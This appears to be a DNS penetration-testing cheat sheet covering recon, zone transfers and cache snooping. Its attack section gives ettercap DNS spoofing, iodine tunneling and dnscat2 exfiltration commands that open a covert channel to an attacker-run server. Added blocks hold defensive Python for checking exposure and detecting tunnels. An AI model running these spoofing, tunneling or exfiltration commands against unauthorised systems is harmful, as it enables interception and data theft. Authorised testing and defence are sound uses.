
DNS Pentest - Port 53


Recon


Banner Grabbing - Identify DNS Server Versions

# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @<DNS_IP>

# Alternatively, use the nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, use netcat to open a UDP connection to port 53
nc -nv -u <DNS_IP> 53

DNS Server Discovery

# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>



Enumeration


Using DNS enum

dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>


Using dig

# Query DNS records
dig hackviser.com

# Query a specific type of DNS record (e.g., A record)
dig A hackviser.com

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com

Using nslookup

# Perform DNS queries
nslookup hackviser.com

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com

# Query a specific DNS server
nslookup hackviser.com <DNS_IP>

Using host

# Perform DNS query
host hackviser.com

# Query a specific type of DNS record (e.g., MX record)
host -t MX hackviser.com

# Perform a reverse DNS lookup
host <IP_ADDRESS>

Any Record Query

dig any victim.com @<DNS_IP>

Zone Transfer

# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>

Metasploit Modules and Nmap Scripts

# Metasploit DNS enumeration module
msfconsole
use auxiliary/gather/enum_dns

# Nmap DNS scripts
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

# Find the DNS server
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16
nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p53 10.10.10.10

# DNS server processes unauthoritative recursive queries
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10

# DNS server cache snooping remote information disclosure
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10

# DNS enumeration via Metasploit
auxiliary/gather/enum_dns
auxiliary/scanner/dns/dns_amp

# DNS enumeration with nslookup: resolve the server's own hostname, then try a zone transfer
nslookup
> SERVER 10.10.10.1
# Give the IP address of the server to find its hostname
> 10.10.10.10
10.10.10.10.in-addr.arpa name = host02.test.domain.
dig axfr host02.test.domain @10.10.10.1
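The zone transfer, open-recursion and cache-snooping checks above can be scripted against a server you administer, to confirm a hardening change actually took. This is an added example, not from the page or from any tool it lists; it uses only the Python standard library, and the names build_query, parse_header, assess and query are hypothetical. It sends a raw DNS query and reads only the response header: RCODE and ANCOUNT for AXFR, the RA bit for recursion, and ANCOUNT on a non-recursive (RD=0) query for a cache hit.

```python
import socket
import struct

# Added example (not from the page). Function and constant names are hypothetical.
QTYPE = {"A": 1, "AXFR": 252}
RCODE_NAME = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
              4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}

def build_query(name, qtype, txid=0x1234, recursion_desired=True):
    """Build a minimal DNS query: 12-byte header, QNAME, QTYPE, QCLASS IN."""
    flags = 0x0100 if recursion_desired else 0x0000   # RD bit
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    labels = name.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE[qtype], 1)

def parse_header(data):
    """Decode the fields of a DNS response header into a dict."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    return {"id": txid, "qr": bool(flags & 0x8000), "aa": bool(flags & 0x0400),
            "rd": bool(flags & 0x0100), "ra": bool(flags & 0x0080),
            "rcode": RCODE_NAME.get(flags & 0x000F, str(flags & 0x000F)),
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}

def assess(data, check):
    """Interpret a response header for one check: 'axfr', 'recursion' or 'cache'."""
    h = parse_header(data)
    if check == "axfr":        # zone transfer served to this client
        return h["rcode"] == "NOERROR" and h["ancount"] > 0
    if check == "recursion":   # server offers recursion (RA) to this client
        return h["ra"]
    if check == "cache":       # answered without recursing (RD was 0), i.e. from cache
        return h["rcode"] == "NOERROR" and h["ancount"] > 0 and not h["rd"]
    raise ValueError(f"unknown check {check!r}")

def query(server, name, qtype, check, timeout=3.0):
    """Send the query (TCP for AXFR, UDP otherwise) and return assess()'s verdict."""
    q = build_query(name, qtype, recursion_desired=(check == "recursion"))
    if qtype == "AXFR":
        with socket.create_connection((server, 53), timeout=timeout) as s:
            s.sendall(struct.pack("!H", len(q)) + q)    # TCP framing: 2-byte length prefix
            length = struct.unpack("!H", s.recv(2))[0]
            data = s.recv(length)                        # first message is enough for the header
    else:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(timeout)
            s.sendto(q, (server, 53))
            data = s.recv(4096)
    return assess(data, check)
```

Run, for instance, query("<DNS_IP>", "<DOMAIN>", "AXFR", "axfr") or query("<DNS_IP>", "www.example.com", "A", "cache") against your own server; a True result for "axfr" or "recursion" from an untrusted network position is a finding.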


DNS Reverse and Subdomain Brute Force

dnsrecon -r 127.0.0.0/24 -n <IP_DNS>
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>
dnsrecon -d active.htb -a -n <IP_DNS>


DNS Cache Snooping

# Cache snooping with dnsrecon: ask the server non-recursively for each name in the list
dnsrecon -t snoop -d hackviser.com -n <DNS_IP> -D /usr/share/dnsrecon/namelist.txt

DNS Enumeration with Google Dorks

# Collecting DNS information using Google Dorks
site:hackviser.com -www.hackviser.com -site:www.hackviser.com

DNS Hacking tools

DNS Dumpster
DNS Recon
Spyse
SecurityTrails
DNSlytics
DNS CertSpotter

Subdomain Enumeration


Attack Vectors


DNS Spoofing

# Poisoning with Ettercap
ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof

DNS Tunneling

# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>

Post-Exploitation


Cache Snooping

dig @<dns-server> <domain> +norecurse

Reverse DNS Lookup

dig -x <ip-address>

Exfiltration with dnscat2

# Server side
dnscat2 --dns server=<dns-server-ip>:53

# Client side
dnscat2 <domain>
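Both the iodine tunnel above and dnscat2 exfiltration have to push their data through the query names and answer records of a resolver, which is where a defender sees them. The following added example (not from the page, iodine or dnscat2) scores a resolver query log for tunnel-like traffic; the log lines are constructed in a simplified BIND-style format, the thresholds and the two-label registered-domain approximation are assumptions, and the function names are hypothetical.

```python
import math
import re
from collections import defaultdict

# Constructed sample query log in a simplified BIND-style format (not real traffic).
# The long hex first labels and TXT/NULL types mimic what iodine/dnscat2-style tunnels produce.
SAMPLE_LOG = """\
client 10.0.0.5#5353: query: www.example.com IN A +
client 10.0.0.5#5353: query: mail.example.com IN MX +
client 10.0.0.9#40001: query: 0a7f3c9e2b1d4f6a8c0e2b4d6f8a0c2e.t.tunnel.example IN TXT +
client 10.0.0.9#40002: query: 1b8e4d0f3c2e5a7b9d1f3a5c7e9b1d3f.t.tunnel.example IN NULL +
client 10.0.0.9#40003: query: 2c9f5e1a4d3f6b8c0e2a4c6e8a0c2e4f.t.tunnel.example IN TXT +
client 10.0.0.9#40004: query: 3d0a6f2b5e4a7c9d1f3b5d7f9b1d3f5a.t.tunnel.example IN TXT +
client 10.0.0.7#5353: query: cdn.example.net IN A +
"""

LINE_RE = re.compile(r"client (\S+?)#\d+: query: (\S+) IN (\S+)")

def label_entropy(label):
    """Shannon entropy (bits per character) of one DNS label; encoded data scores high."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def registered_domain(qname):
    """Approximate the registered domain as the last two labels (assumption: no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def analyse(log_text, max_label=30, min_entropy=3.0, min_hits=3):
    """Group queries by (client, registered domain) and flag tunnel-like pairs.
    Heuristics and thresholds are assumptions: long first label, high label entropy,
    TXT/NULL record types, each seen at least min_hits times from one client."""
    stats = defaultdict(lambda: {"queries": 0, "long": 0, "high_entropy": 0, "rare_type": 0})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        client, qname, qtype = m.groups()
        first = qname.split(".")[0]
        s = stats[(client, registered_domain(qname))]
        s["queries"] += 1
        s["long"] += len(first) > max_label
        s["high_entropy"] += label_entropy(first) >= min_entropy
        s["rare_type"] += qtype in ("TXT", "NULL")
    return {k: v for k, v in stats.items()
            if v["long"] >= min_hits and v["high_entropy"] >= min_hits}
```

On the sample, only the pair ("10.0.0.9", "tunnel.example") is flagged; the "rare_type" count is reported alongside so an analyst can weigh it, since legitimate TXT lookups (SPF, DKIM) exist too.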
